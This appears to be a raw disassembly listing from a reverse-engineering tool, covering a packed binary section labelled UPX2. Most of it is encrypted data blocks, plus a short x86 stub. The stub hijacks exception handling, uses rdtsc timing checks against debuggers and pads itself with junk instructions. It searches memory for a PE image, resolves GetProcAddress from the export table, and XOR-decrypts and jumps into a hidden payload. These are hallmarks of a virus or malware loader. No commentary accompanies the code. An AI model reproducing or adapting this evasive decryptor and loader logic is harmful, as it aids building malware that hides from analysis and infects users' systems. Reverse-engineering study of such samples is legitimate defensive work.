1916EC30h, 98FDCD67h dd 85F32DCBh, 0DB6AEA9Dh, 48B58B73h, 0A9C392B8h, 42C43436h dd 25FA4E4Eh, 582E054h, 9E6638B8h, 755B709Ch, 0F6C1035Fh dd 143E61E5h, 96890AF4h, 5CC9B43h, 0A089B723h, 0BA5D73B7h dd 5DBBB159h, 4B8A4FC3h, 0FAD56563h, 6F13B7EFh, 8479CADBh dd 8243570Fh, 20A8314Fh, 76494CACh, 0B0828BBBh, 0B9E15F34h dd 68F59579h, 0DCCE1FABh dd 3EBDE14Ah, 59A490C0h, 0DE922D13h, 5669D3F6h, 4C4C6AA0h dd 0E51CD3BFh, 67EA3A4Ah, 3EF9F790h, 1B22066Bh, 0F46348B0h dd 0DF6EB121h, 2A8C15E8h, 7CF65604h, 0A51B3B12h, 53CA1A7Eh dd 108046D1h, 0E458F34Ah, 451DFB15h, 0A364F9ACh, 783012CBh dd 5C3776DFh, 0AD8D5385h, 11E92D1Ch, 61C61438h, 0B8240B5Bh dd 5608E870h, 0EB1540D0h, 0C9369F14h, 1E5AB54Fh, 0DDCEF040h dd 0D4242EF3h, 119B0418h, 84E27E14h, 0E5DD1BD4h, 0F771996Ch dd 7A166C88h, 7BDA97B2h, 4EB1DF2Fh, 0B728C651h, 8248D7F8h dd 0D8A26E75h, 5DBECC51h, 0F0251CD7h, 6A8CBE67h, 66919684h dd 1D3EB260h, 7F08C1BCh, 0FA76EE53h, 18868D35h, 869BB3D0h dd 0CFF03BE4h, 7B5689C1h, 0D9F16674h, 0ED0E788Ch, 0AF7B1A9Dh dd 5EB99206h, 0C2E05BE4h, 75CF28E0h, 9619373Ch, 29DCDC38h dd 1B8AFFBAh, 5B4A7874h, 0C58F1583h, 0A2E4D097h, 4FD7AF56h dd 0CE5EE8E9h, 0FBFFA509h, 0D996BC31h, 47B30624h, 94B9762h dd 0E4EAAA65h, 34061478h, 1F87EF98h, 0A3ED889h, 0A4A1DD33h dd 2DFBFDE2h, 392C63Dh, 35A63020h, 0B7CA8A3Ah, 11E08C01h dd 835A3E74h, 3AE17EC6h, 26467726h, 0FDD04CD8h, 0C34BDACEh dd 510B8800h, 65AA4A25h, 654343D8h, 33E21E6Dh, 0E0FE6870h dd 91A74285h, 48360C91h, 26A5B3B0h, 0FD7EE964h, 5F8A2AFCh dd 0C269F6Ch, 0BD2E748h, 0E56E4C55h, 0AFC3EFD1h, 0BE62E988h dd 4A4CFB24h, 0B94BA0D0h, 0A3EF0D42h, 818644C1h, 0AFB2AE14h dd 49038839h, 8DDA7275h, 4C75351Fh, 43025440h, 6F8898A0h dd 0B4A23543h, 0B999DB25h, 0AB827C85h, 47E2459Bh, 0C2B9323Ch dd 0B9C6CEC8h, 0EC0EBD8Ch, 3C8A4F7Fh, 4C2A9A9Eh, 31048C0Dh dd 473CC5D4h, 899676F3h, 2065FDF1h, 89B467AAh, 0C7983744h dd 0DDEE1000h, 0C15894F7h, 0F232BE9Bh, 0CEB50ECEh, 0A54E4154h dd 0DF7AD2ECh, 0E41F387Dh, 0B3A2C4ECh, 345E55CDh, 0EA613A4Ch dd 0C1168410h, 0A2754A67h, 753E42D4h, 0DF5A1741h, 8C85FCF8h dd 817156B5h, 585914D3h, 37DA33B8h, 0B1E66458h, 0EBAC3A7Bh dd 36E11890h, 72EB9A84h, 6CDD3337h, 5362645Ch, 29815285h dd 7AADA84h, 23BE81B3h, 0F1698E44h, 31B46960h, 8F1A42ECh dd 0BA3ED683h, 209BC5C6h, 0F0554492h, 0D79ABA94h, 21CE8993h dd 0DDB05E24h, 66FA84DBh, 2FEA7AC9h, 3E956C88h, 0F332C6CCh dd 4534ABC0h, 0A46230DDh, 8A71530Fh, 4BE0A291h, 313B7F30h dd 4FDAF275h, 1DF63C68h, 0C00A6186h, 2D07FCD2h, 358EFF35h dd 0A2EDA4C8h, 0DCB2FFDCh, 95A7DC95h, 0DFBAF22Ch, 0CED47848h dd 0B81A377Ch, 0B4F13F7Ch, 34291677h, 0AD345F90h, 5F919885h dd 0E0F371AFh, 0AF8ABB9Ch, 4B7E61A1h, 0C7213654h, 8CE1CE3Fh dd 288D67EEh, 4B264499h, 0DB7B1C21h, 4C588DD0h, 4B2C2A3Eh dd 891FCA1Ah, 0E995EECDh, 6949FBFh, 0ADE9B616h, 0C583E368h dd 9B227EADh, 781EC8B0h, 5C2F278Dh, 0EBB2F161h, 8691D614h dd 5DBE2048h, 0B7A22DBFh, 3AE6E458h, 0EC8B1637h, 0C51E98C3h dd 207A775Bh, 79574CD8h, 0D406A6E4h, 8D8643C7h, 700AFABCh dd 0F1FF30BDh, 3BE20E54h, 0C7F91C60h, 10ED9964h, 0C4BD4657h dd 0A3423400h, 0B6E7D503h, 0DC87C1D4h, 0A1E44495h, 0E0C03D34h dd 4D95B353h, 867E179Bh, 1915EC98h, 674646A4h, 8F86254Bh dd 0AA69FACCh, 81961648h, 990E2B17h, 3DBF0820h, 4CA28C7h dd 0F9B4C0EDh, 4B582F84h, 0D7A773D3h, 0E708CBB4h, 513E475Bh dd 0E906FB7Fh, 95F6D800h, 5EBA3205h, 0B88F840Ah, 8678B627h dd 6D1E7902h, 0FEAE1F6Bh, 2146F4A8h, 7D166ED4h, 0C51625F3h dd 2F2C021Ch, 0B032D9DFh, 0E3D2B654h, 299B1062h, 12FDAC82h dd 0F136FD1Ch, 4B461EB4h, 10D47EA5h, 0FF6AEB6Fh, 6012A9FFh dd 0F3B28634h, 6BBE040h, 0A5E83DD6h, 23D096D2h, 912B0563h dd 0DFFC7AB7h, 38B874CEh, 0A2122EDBh, 811D3226h, 81133378h dd 37CA1A7Eh, 6B59E057h, 5EFD418Bh, 450E5AE8h, 0A188E753h dd 4CA9CCD8h, 53626490h, 93A815FFh, 8A27DA0Ch, 61D67658h dd 0F98A1BD9h, 47AFE860h, 0DAE542E6h, 0C926DEF4h, 1DF4633Bh dd 0C89150F0h, 0D79AE8A0h, 0F8091E7h, 3E4F5E24h, 0E5CEF918h dd 7DA2A793h, 66406C98h, 0E30C6431h, 11EBA3C0h, 0A76A6A9Eh dd 1863C3Bh, 31FF2E14h, 3A530931h, 57DAF274h, 0EC373398h dd 0C3028304h, 9EED3025h, 78BAB574h, 0C4E62119h, 1641FEE4h dd 85B45800h, 5EDCAE59h, 55DA2834h, 0F3E11315h, 12F10468h dd 0AF2F6F63h, 5EB98E0Dh, 49D1C3Ch, 0AA50490Fh, 9BCCFA21h dd 993643Ah, 8BB23644h, 42116FC5h, 5381D309h, 0C4AB74BCh dd 0CB52DFFCh, 4356A85Bh, 7D7C686Dh, 0B1C0897Bh, 334D0624h dd 8DA4A4CBh, 7215EA0Eh, 41162A8Ah, 1A2AAA17h, 0CA01948Eh dd 0CC595790h, 0CB9E782Eh, 0EB6D29FEh, 0A251CF5Fh, 0C372495Dh dd 0FAE6E458h, 6B2D86C5h, 0D8F69890h, 0DD3AF2ACh, 49EE4CE8h dd 3B72A6E4h, 2D8E0010h, 3FAA7EDEh, 0E1C6B5BDh, 3BE20DBCh dd 95D2AA70h, 0E33E9601h, 0B1B53265h, 0C34B0AC4h, 0FD6ED008h dd 73DEA1FCh, 0AB2DD928h, 32A433B5h, 82363840h, 0DE056D8Ch dd 1A16E84Ah, 723040A3h, 8D0F5FC5h, 0FFCA7FF0h, 107C15h dd 0FF8B01h, 24Eh dup(0) dd 0DB000000h, 3142A0h, 1315h dup(0) db 87h, 0DBh ; --------------------------------------------------------------------------- push ebp mov ebp, esp call loc_3143201C xchg ebx, ebx nop call sub_314320C0 mov edx, edx jmp short $+2 stc jmp loc_31432058 ; --------------------------------------------------------------------------- loc_3143201C: ; CODE XREF: UPX2:31432005p push dword ptr fs:0 mov fs:0, esp mov ds:dword_3143205B, ebp mov edx, edx stc xchg ebx, ebx xor ecx, ecx push ecx push 10h push 80h push ecx push 800h push ecx push 80000000h push ecx push 10000h call ds:dword_31428090 ; GetProcAddress loc_31432058: ; CODE XREF: UPX2:31432017j cmc cmc ; --------------------------------------------------------------------------- db 0BDh dword_3143205B dd 12FFC0h ; --------------------------------------------------------------------------- cld sub eax, eax loc_31432062: ; CODE XREF: UPX2:31432068j dec al or al, al jz short loc_3143206C jnz short loc_31432062 jmp short loc_314320D3 ; --------------------------------------------------------------------------- loc_3143206C: ; CODE XREF: UPX2:31432066j clc cld mov ecx, ecx clc call sub_31432078 mov eax, eax ; =============== S U B R O U T I N E ======================================= sub_31432078 proc near ; CODE XREF: UPX2:31432071p pop ecx stc add ecx, 68h xor ebx, ebx or ebx, 2990h cmc mov ecx, ecx mov esi, 46h jmp short $+2 xchg ebx, ebx push ecx xchg ebx, ebx xchg ebx, ebx clc loc_3143209A: ; CODE XREF: sub_31432078+33j call sub_314320CD nop jmp short $+2 clc add ecx, 1 inc esi dec ebx cmc or ebx, ebx jnz short loc_3143209A pop ecx nop stc mov esi, [ebp-8] mov fs:0, esi clc leave nop jmp ecx sub_31432078 endp ; sp-analysis failed ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_314320C0 proc near ; CODE XREF: UPX2:3143200Dp arg_C = dword ptr 10h mov ecx, [esp+arg_C] xor eax, eax pop dword ptr [ecx+0B8h] retn sub_314320C0 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_314320CD proc near ; CODE XREF: sub_31432078:loc_3143209Ap xchg al, [ecx] xor ax, si cmc loc_314320D3: ; CODE XREF: UPX2:3143206Aj cmc xchg ebx, ebx mov [ecx], al retn sub_314320CD endp ; --------------------------------------------------------------------------- db 87h, 0DBh ; --------------------------------------------------------------------------- cld jmp short $+2 call $+5 mov eax, [esp] cld mov [eax+32C7h], ebx mov ecx, [eax+297Fh] mov ebx, [esp+4] and ecx, 10000000h jz short loc_3143212A pop ecx mov [eax+32CBh], esi mov cl, [eax+2983h] mov [eax+32CFh], edi cmp cl, 0E8h jz short loc_3143211F mov ebx, [eax+2985h] jmp short loc_31432128 ; --------------------------------------------------------------------------- loc_3143211F: ; CODE XREF: UPX2:31432115j add ebx, [eax+2984h] mov ebx, [ebx+2] loc_31432128: ; CODE XREF: UPX2:3143211Dj mov ebx, [ebx] loc_3143212A: ; CODE XREF: UPX2:314320FDj push ebp mov ebp, eax sub dword ptr [esp+4], 80E3h sub ebp, 101005h mov edi, [esp+4] lea esi, [ebp+103990h] mov ecx, 0 rep movsb call sub_31432203 mov ecx, eax call sub_31432203 sub eax, ecx jz short loc_314321D5 cmp eax, 100h ja short loc_314321D5 and ebx, 0FFFFF000h loc_31432169: ; CODE XREF: UPX2:31432178j cmp dword ptr [ebx+4Eh], 73696854h jz short loc_3143217A loc_31432172: ; CODE XREF: UPX2:31432187j sub ebx, 100h jnz short loc_31432169 loc_3143217A: ; CODE XREF: UPX2:31432170j mov eax, ebx add eax, [ebx+3Ch] mov edx, [eax+78h] cmp word ptr [eax], 4550h jnz short loc_31432172 add edx, ebx mov esi, [edx+20h] mov ecx, [edx+18h] add esi, ebx push ecx loc_31432194: ; CODE XREF: UPX2:loc_314321A8j lodsd add eax, ebx cmp word ptr [eax+2], 5074h jnz short loc_314321A8 cmp dword ptr [eax+5], 6441636Fh jz short loc_314321AD loc_314321A8: ; CODE XREF: UPX2:3143219Dj loop loc_31432194 pop ecx jmp short loc_314321D5 ; --------------------------------------------------------------------------- loc_314321AD: ; CODE XREF: UPX2:314321A6j sub [esp], ecx mov esi, [edx+24h] pop ecx add esi, ebx movzx eax, word ptr [esi+ecx*2] mov edi, [edx+1Ch] add edi, ebx mov esi, [edi+eax*4] add esi, ebx lea eax, [ebp+10113Fh] mov dx, [eax-17h] call sub_31432208 jmp short loc_3143221D ; --------------------------------------------------------------------------- loc_314321D5: ; CODE XREF: UPX2:3143215Aj ; UPX2:31432161j ... mov eax, [ebp+103984h] and eax, 10000000h jz short loc_31432201 mov edi, [esp+4] lea esi, [ebp+103988h] lodsd mov ebx, [ebp+1042CCh] stosd movsb mov edi, [ebp+1042D4h] mov esi, [ebp+1042D0h] loc_31432201: ; CODE XREF: UPX2:314321E0j pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_31432203 proc near ; CODE XREF: UPX2:3143214Cp ; UPX2:31432153p rdtsc retn sub_31432203 endp ; --------------------------------------------------------------------------- dw 19FAh ; =============== S U B R O U T I N E ======================================= sub_31432208 proc near ; CODE XREF: UPX2:314321CEp push ebx mov ecx, 2845h mov ebx, edx loc_31432210: ; CODE XREF: sub_31432208+11j xor [eax], dl loc_31432212: ; CODE XREF: UPX2:31432229j sub dl, bl xchg bl, bh inc eax xchg dl, dh loop loc_31432210 pop ebx retn sub_31432208 endp ; --------------------------------------------------------------------------- loc_3143221D: ; CODE XREF: UPX2:314321D3j adc dl, ds:0A4060000h pusha mov eax, ds:0FD50D061h jo short loc_31432212 dec eax cvtpi2ps xmm0, qword ptr [edx] iret ; --------------------------------------------------------------------------- dd 1A9ABFEEh, 0A0ED5238h, 54BB4ED9h, 1EC28E1h, 1A120304h dd 39511C5Bh, 520C2D0Ch, 0AEEB0F53h, 916796B8h, 0EF5DA276h dd 0D567DA21h, 0B2BCCE61h, 0CCB5A992h, 51432DFDh, 0F45DF0F9h dd 0F3F2024Ah, 3C7AF618h, 0F79686E9h, 0EBCBF14Bh, 30573417h dd 23F7A350h, 3806B39Bh, 736EBEECh, 51A15AAFh, 0E99042FDh dd 682D209Ah, 613CE3DAh, 5567AE2h, 8CB79350h, 3DF69565h dd 0A4538BCCh, 30B4292Ah, 0BCDFA6EDh, 0DD296745h, 577BCE84h dd 0F05C52C7h, 2A40E630h, 0E8F72E7Bh, 0B13AFFCCh, 109134A8h dd 9B3A3E5h, 0E12E2226h, 0AD59389h, 60083AC2h, 4C84CB48h dd 0CDAA0D6Eh, 64336042h, 7FEE82CBh, 7CBFA25Ch, 9CCA09A6h dd 5758CE1Eh, 0A0399A2Ah, 9A722F18h, 0D0C5A2E0h, 0C493CC40h dd 459ECA10h, 0DC3FE8FEh, 6CF22293h, 0F4CBEC0Ah, 2C7725h dd 87671690h, 148EABA1h, 0C9821E1Ch, 30C13AEAh, 2EC3A335h dd 0ED9E4296h, 0B8B8ACABh, 0AF5D102h, 351755F8h, 63E0E733h dd 2F807E9Ch, 0C7C876D1h, 80486838h, 0A8DECAA1h, 2154AEC5h dd 0C06984A4h, 496702E3h, 4791DDEEh, 73E3DEFEh, 0F1DBEAA0h dd 0FC7BF6F0h, 84D6AE6h, 81E40E35h, 20F92434h, 0A8B8E655h dd 3885301Ch, 2C033E06h, 50254A3Ah, 0B42E5662h, 69D735DAh dd 748A06F4h, 15A67A73h, 8C37B876h, 99F59866h, 925661DCh dd 5891BA94h, 0BC5FB67Dh, 0C82F93AFh, 8DFBA414h, 0EAA3D001h dd 0D23D734Fh, 98EF26Eh, 528E7D8Fh, 10011A24h, 1EFB92E7h dd 2E7522B6h, 7A6B2E84h, 0C757E06h, 3E92B920h, 0D5D542D0h dd 74B48809h, 0FDB8598Ah, 6C01C8E5h, 1B033326h, 94D9FB1Ch dd 521419C2h, 0AC77B6AEh, 0BA453651h, 4198BE2Ch, 0D0F1F438h dd 53AEA637h, 0F8453913h, 2ECE6564h, 0FF19EA0Ch, 89680770h dd 18A52BE6h, 1A459B17h, 40AE2A7Ah, 139AB939h, 0C3ED523Fh dd 44858459h, 9F93B9A2h, 0E9D86701h, 78354B02h, 0BA21F387h dd 99228ACAh, 138EE757h, 0B864EBF3h, 0B5934644h, 7D74BA12h dd 0CCD7F9A8h, 0D8FF1D25h, 949C078Ah, 0F3D0694Eh, 5FCB672h dd 62CD68B1h, 0F72E83ACh, 99690A97h, 2C372649h, 0C6483693h dd 222CC113h, 1DA5C711h, 5C6F5688h, 2FB0C930h, 9039C520h dd 0BD2DEF7Fh, 0EA0B86D0h, 33139007h, 46415CDFh, 0DAC521DFh dd 0CE33DEF8h, 426C2C6h, 10F0CEFEh, 0E021DA08h, 861FE630h dd 92B7A3BEh, 914CAEC2h, 10913454h, 5C8B9530h, 286FCE5Eh dd 5E3FA504h, 2A75B1D2h, 26872CE0h, 583F006Ch, 6451B254h dd 21F1000Ah, 83EF89B2h, 98B35433h, 1102D174h, 0A7AD95BDh dd 21F7A611h, 0A8D5B26Bh, 0C82807ACh, 3FEACA7Ah, 31AE73BBh dd 0E8EDF216h, 0E0896B69h, 0E066FAA2h, 2C0D52D0h, 8DCAED24h dd 241320C2h, 458EEA6Fh, 3DD0DE8Ch, 59854286h, 73B4E54h dd 26C1E47h, 1E870185h, 14CC04D7h, 841619E9h, 9511620Dh dd 29F09628h, 0A8CDE0BAh, 8AC93B3Bh, 3F2EBA82h, 0DC79E0F5h dd 0B215B82Eh, 0B27621FEh, 49B1FAF4h, 0FC7FF7B0h, 81AC29F1h dd 434F2A38h, 1E738FFDh, 0DA8426C0h, 7B3971Dh, 10533E7Ch dd 0CEB4B56Dh, 0D9EF4636h, 2EDB1616h, 68F9027h, 0A42D859Ch dd 0E627EC48h, 0E606D24h, 21C38EE2h, 234DDE6Ah, 0BC5A3E90h dd 59E4F146h, 51C2F4F7h, 0E0D9E5D4h, 9016D4C5h, 8B06D65Ah dd 2C478D3Eh, 1EA6CB9Bh, 489F16E8h, 78CC74E6h, 0A1947DD4h dd 4029041Ch, 385E86A5h, 7CA1ADE1h, 5226D1B4h, 98717AB5h dd 83C08B9Dh, 0AE987D75h, 7FDB9ECAh, 886D1B4Ch, 0FB77A691h dd 866327A1h, 51ECBE3Ch, 0D0F1F4DCh, 23541621h, 8227E269h dd 9E4B8464h, 68199032h, 0CE30601h, 18DFD645h, 0AF8F74CCh dd 66B3D5AEh, 3C2B6940h, 0A0247106h, 0AB44B10Eh, 75D8CF2Fh dd 3D056660h, 0EDDA226Fh, 84E34026h, 53E14E59h, 0C4D76923h dd 9AB1A22Eh, 0BA40AE44h, 0C0F8BA12h, 0CCC7C6E0h, 0D895D2AEh dd 0CDE7DE7Ch, 0F031EA4Ah, 0AAAEF618h, 3A58FDB5h, 0BF9B1E8Ah dd 0E0EDB6DBh, 0C2D5DD25h, 4590BFDDh, 16D32EF5h, 6E2BDF45h dd 0D9E65698h, 682D201Ah, 740B78CCh, 0EFB636F2h, 0DCD7F3ABh dd 0F103FBFCh, 0C124FB30h, 0C57DCB7Ch, 0ECDFF79Dh, 0F69F5739h dd 51F2CE84h, 0E0599832h, 8D55BAF3h, 99AB978Dh, 4BD79BA1h dd 73E460F8h, 4A13651Ch, 4B787142h, 47872E70h, 25D548A6h dd 3EC446CEh, 3D21330Bh, 14F377Ah, 2B26A4Bh, 19CB17BDh dd 0EDE1EBE0h, 0E42BEF39h, 0E14EF42Bh, 0C985E510h, 0E8A0C6BFh dd 0A1F0D1DEh, 0D020B909h, 0BD4AA40Bh, 8DAF8762h, 91BF8189h dd 65EB92E6h, 4F6762E1h, 6C54773Ch, 566B4A79h, 30B54B8Fh dd 5DFA44FBh, 273927F2h, 3153223Bh, 523A2A4Eh, 1CB608A3h dd 0CCA1ACDh, 0ED0B3B8Ch, 0E229DE2Eh, 9C6BF74Dh, 0CDB1CBB0h dd 0D1C6C790h, 0B92AD5C6h, 0A122B213h, 0BD78BB7Ah, 819198FCh dd 92D8A6AFh, 850D97EAh, 7C284566h, 71776772h, 529D6E43h dd 58C244B9h, 38C441FBh, 2275B2Bh, 3442653h, 5C8A2C61h dd 2EC90791h, 20EE02CDh, 803C171Bh, 0C153E307h, 0F480F661h dd 0CAA2D6B9h, 0F1F4C6CEh, 0C83AF178h, 0B840A712h, 0B197A752h dd 85A4BBACh, 89D0E6F1h, 9500A60Ah, 7052AE3Ch, 57014B72h dd 7999628Dh, 47F451C4h, 512C2EEAh, 325C6C26h, 22682F53h dd 58942AABh, 32D73BFBh, 1D0406E5h, 1A513F3Dh, 0E960F049h dd 0FAB4E780h, 0CFE59A83h, 0C53BC2F1h, 0CA24C03Ch, 8913FF55h dd 0B9B7BA9Bh, 0BAE0A1ADh, 8D118BD0h, 913BA164h, 6C70BC5Ch dd 7C864B65h, 7FDB7BBEh, 54CC1EDDh, 4201440Fh, 4F7A5557h dd 3ABD4275h, 27DE2DBBh, 26BB69D1h, 18241419h, 1757223Eh dd 0F7801B6Fh, 0F58FB8E9h, 0CF8FE2D0h, 0C11BD613h, 0C06ACB28h dd 0A290C866h, 0BFA2B295h, 0BDC6D2EFh, 880A9808h, 9D58BE2Fh dd 90ACF67Dh, 8BD6783h, 60E877E7h, 493D77E7h, 4363433Dh dd 5D695B58h, 21BE57B8h, 3DCF1FBAh, 353926E9h, 0E721533h dd 11670762h, 0F2B02CF2h, 0E0C6F3B4h, 0F719FECFh, 0D6149E3Fh dd 0F674DE43h, 0BCBADA91h, 0ACECB688h, 0A008BBFEh, 9620A832h dd 8B728A59h, 97B1819Bh, 4DD9BA7h, 62C27ED4h, 793B770Dh dd 4D714B70h, 779F6004h, 34D85FA0h, 23F516C5h, 2B26370Dh dd 2757103Ch, 4900F78h, 13CD26BDh, 0FBFEE7C5h, 0DA5BF631h dd 0C55BD936h, 0FF92D271h, 0D1B1D1BBh, 8A93D0C3h, 0B513890Eh dd 894AA229h, 0B88F8765h, 91A88196h, 4E9989C1h, 7C064BF4h dd 6F507B18h, 41507853h, 5FB85E89h, 48D136D6h, 260832C9h dd 31572712h, 2F7D1422h, 3CB90380h, 1DC61DCCh, 0EB270DFFh dd 902FEF31h, 0EC40E266h, 0CD8ECC93h, 0DBC2DAA7h, 0B437BAFCh dd 0B828B430h, 8E61B14Bh, 9197AC95h, 95FC86ABh, 850D99F5h dd 59394C66h, 6D696B41h, 4F8F744Bh, 58D64BA2h, 6CEB5DF7h dd 2A365503h, 755043Ah, 399B3F7Ah, 1CCF0B80h, 39E70FD1h dd 0F2361717h, 0F8758639h, 0F19BC762h, 0C1A7F1BFh, 0D9E3DEF9h dd 0D30BD116h, 0A15EAC07h, 0BD89BA47h, 0B7C9BD8Ch, 98C4A7E3h dd 8D11801Fh, 6850FE3Ch, 63647975h, 79A47587h, 47FE22C2h dd 570E40EAh, 255E3A26h, 3F682E54h, 36AC309Ah, 64C633DDh dd 6120FF8h, 125A0558h, 0E77E8242h, 0E0BEE597h, 0D4C7D3C2h dd 0C919D4F5h, 0D729F12Ah, 0A55BDB5Fh, 0B58DAE94h, 0A8C19FC8h dd 8D1390F3h, 802EA910h, 6E779571h, 69936565h, 79C141AAh dd 6D837BE8h, 42345E04h dd 736B5356h, 9832776h, 20D507D4h, 5E728C7h, 9272904h dd 14572750h, 0EABA7E4Dh, 0FEB3EFAEh, 0F9DDE2CDh, 0C11BC617h dd 0F52BCB28h, 90B8EC56h, 0E2F5F5A9h, 0D8D99EEAh, 0A704BB2Eh dd 95428526h, 0FC869353h, 47AA67B4h, 5FF56BC4h, 582C63E7h dd 49652611h, 5D706379h, 2585479Eh, 15C43FD6h, 0E6F17F0h dd 0D6E0533h, 186A3850h, 0F89C1F87h, 0BFF18681h, 0CE77F878h dd 0CE97150Ah, 0C2EEF82Bh, 2920E0E0h, 0C8BD8096h, 822D0A1Fh dd 1F1F8A34h, 79E8FE40h, 0F8F5CC40h, 5AA33A4Fh, 9D810258h dd 0D464ED21h, 281D4A67h, 7866C604h, 40D339F6h, 1CD643CAh dd 0D350383Dh, 0B0A80EF0h, 309B3E5Ah, 83EC2489h, 98B36433h dd 989F0D74h, 9EC70FBDh, 6874A600h, 2D4871D6h, 0C4838358h dd 0D00B0349h, 0DC1FBE1Ah, 2C76E224h, 0B4A1BFB5h, 18F3ABE2h dd 586FC603h, 0E7651C24h, 343DFC89h, 1015A9EAh, 0FC1AE48Bh dd 0BFAFDB89h, 9618168Eh, 9F3A0DE1h, 9328A718h, 0DD217D41h dd 0D4737E8Ch, 90336632h, 0F6DB1D28h, 0C21129F6h, 0B4ABC684h dd 0C213BA82h, 0A447AC32h, 0D815A0C2h, 0B7B2DE96h, 2624159Ah dd 0A37FE6A6h, 2ED8FD3Fh, 911B1E0Ah, 0AB986EFDh, 3CA2AE5Dh dd 0B589D19Eh, 54433EF9h, 7F0493Ah, 0D73DA95Bh, 7883A053h dd 0AE04E3A4h, 68597A5Ah, 73D8796Bh, 0A62F1785h, 2B4E9ECCh dd 0B091838Dh, 43A0AC90h, 0EA849B9h, 59FBDE2Ah, 0E0E0F46Dh dd 139E0EB0h, 7DEE0D81h, 423C086h, 3075CA9Fh, 35F49965h dd 0DC7522B6h, 0BF94D17Ah, 5007E8D7h, 38C7C320h, 105ADFE5h dd 8CA35E95h, 8F8E9455h, 0BF60B1D3h, 880D6A73h, 15868EF4h dd 0B0B2862Fh, 21BE9590h, 0A85B15DBh, 9547EF2Ch, 81B09AABh dd 0E2FD4337h, 0ECFAE286h, 0D2DE1140h, 5D19EA0Ch, 59E702C2h dd 18B51226h, 0C902439Ch, 30413121h, 0A992C952h, 48FD5910h dd 74761C84h, 60A35A86h, 0A5BA2F3h, 6379F7F9h, 0A43E7E1Ch dd 8B9F0F1Dh, 9CAB96B8h, 6B00A25Ch, 5C73B42Eh, 0C0F9BA1Bh dd 66A6846Dh, 28E01B50h, 0A4F6B7BFh, 0F531FA75h, 0BEF7FE9Ch dd 378D976Fh, 0F66C0EA4h, 20814F41h, 71372650h, 23A0DF9Fh dd 0D9583EFCh, 50B175FEh, 544B2A0Bh, 0D1B96D56h, 0F50B6E24h dd 80DB721Eh, 88CFD2C0h, 6775928Fh, 0B47DE4C9h, 3DED212Ah dd 0BDDB927Ch, 0A2FDC2C6h, 0D47F2694h, 0B21FDA62h, 1340E662h dd 0E8DB846Bh, 897ACDCCh, 10800E0Dh, 761E4768h, 29777334h dd 34EB2E6Ch, 0D5466892h, 4C9778E2h, 2CA3D7F8h, 0C770E67h dd 70F16B0Eh, 580B898Fh, 888D8086h, 0AB791B8Bh, 25709A52h dd 4FE1D2D0h, 6C4EE2CAh, 95C1BEC6h, 459E9C2Dh, 0DC3FE8F2h dd 9D3D674Fh, 6134B834h, 89C494h, 5E23510Dh, 40717819h dd 25078991h, 37A2AEAh, 658F5C78h, 183DE975h, 46B1E04h dd 0F5F60872h, 6CC758BAh, 7AADB63Fh, 0F08C7E8Ch, 5BE827Eh dd 9C1FA93Ah, 0BA485DA5h, 0E9ABBEFBh, 4079BE50h, 0CD32CC5Eh dd 5C985968h, 7E3CEE9h, 0F02467D3h, 0FF7FE688h, 0DAB254B7h dd 9C14CEB0h, 20E91B1Dh, 2DA7A2DFh, 605329Eh, 2434B56h dd 5F2174BAh, 5CEE578Ch, 4883E2D6h, 0F5CD9FD1h, 0CE102A4Ch dd 765F307h, 99B354C1h, 0F50DB593h, 0E6C0AAC0h, 0B6CA492Bh dd 912DD279h, 51F40F2Fh, 0E0C9DA3Dh, 0F20C633Dh, 0F80FF26Eh dd 433F224h, 0EF525A1Ah, 0CF01C7Dh, 28911FB6h, 0B1642E84h dd 40393AEDh, 4C07F7C9h, 8EBD3EEh, 6BF517EEh, 7071CF0Fh dd 74F9F558h, 8700BE8Ah, 94DB1770h, 0D589A6C2h, 964B0A63h dd 0B8C93751h, 0C9BEBE2Ch, 0F0C1EADAh, 0B9C8F7F5h, 440297E2h dd 883ECE58h, 20E684B3h, 79937268h, 1BCB93BFh, 0BAC24ECh dd 7797421Fh, 0D1036C7h, 48CA52BCh, 659B9D4h, 5E23CF5Dh dd 0AC646660h, 2875226Eh, 84F377E4h, 0E7AECEDAh, 0FDE0FAC6h dd 3DA2A212h, 0B43B915Eh, 0F68D7A97h, 494E0FD3h, 0D885EDEAh dd 0E663B62Dh, 0A1606A4Ah, 6900A64Eh, 8DD3DF8h, 0F049B39h dd 13391A92h, 7C667299h, 0C754634Ch, 54ED6C79h, 74A5CDBAh dd 6249C377h, 0ABC56246h, 617CE3A4h, 79D87AE2h, 0E6A6EC03h dd 67466D8Fh, 0B1BC9A2Fh, 0EA656AAFh, 6C546DCBh, 98AEC975h dd 17CE43A8h, 6B49CA7Fh, 0EC16EA8Ah, 0F06F79FEh, 7B3FECDh dd 704A2162h, 0BABCDDE3h, 6F185657h, 1A00DBE6h, 13B6FD51h dd 0C7D08A2Bh, 320102BAh, 0E710F7Ch, 966495F5h, 0F7BF66E6h dd 98B3D82Bh, 989F0D74h, 49AA5569h, 0C6F06117h, 31C55ADEh dd 9750BDE3h, 87358C35h, 806A8409h, 9A9E8B5Bh, 92A49D8Bh dd 69CEA6C6h, 7B0862EEh, 6D764E3Dh, 4A666C6Eh, 42B47C9Eh dd 52F05FCBh, 381507DAh, 31492138h, 15D5A50h, 18B20182h dd 0CD61DF6h, 84737C8Ch, 1F33DF0Ah, 0F37DE6F8h, 86B0CB8Eh dd 0D3C8DCADh, 0B818D6F3h, 0A037E819h, 9B5C9C2Eh, 9399FEB7h dd 95C288AFh, 0A9758FEEh, 281F4735h, 5D54445Ah, 56CF3A4Ch dd 59C354B9h, 386D6794h, 19533E6Ch, 4E8CA7BBh, 0D9295618h dd 68AD77A1h, 0A1E91A4h, 41596A4Ch, 0B05399A8h, 2D7E8C64h dd 0A4D3A0EAh, 9EAD06F3h, 3D399C0Dh, 0BD303D78h, 0EE464337h dd 6BC9CADDh, 49C0E4C6h, 7DE85718h, 423C6FCh, 28D78F95h dd 953516F8h, 6611D8F0h, 35DAD57Ah, 10D2F5B0h, 0B3FC67C8h dd 7CA9D111h, 20D65AB4h, 70716262h, 3F792558h, 0C441C608h dd 1E4E71F4h, 0ABA98AFCh, 3F7AD250h, 4716B034h, 0D42D8CB9h dd 433135FAh, 23514120h, 0E8760A69h, 0B218EE64h, 5356A571h dd 40AB422Eh, 9220EDCEh, 0CC830EA2h, 0CFAED416h, 0C3E936D0h dd 9460BDF9h, 67BB5EC6h, 880CD76Bh, 3D577632h, 2874236Fh dd 7BA22F5Dh, 80FF0C4Fh, 9C847EA8h, 0FB08A276h, 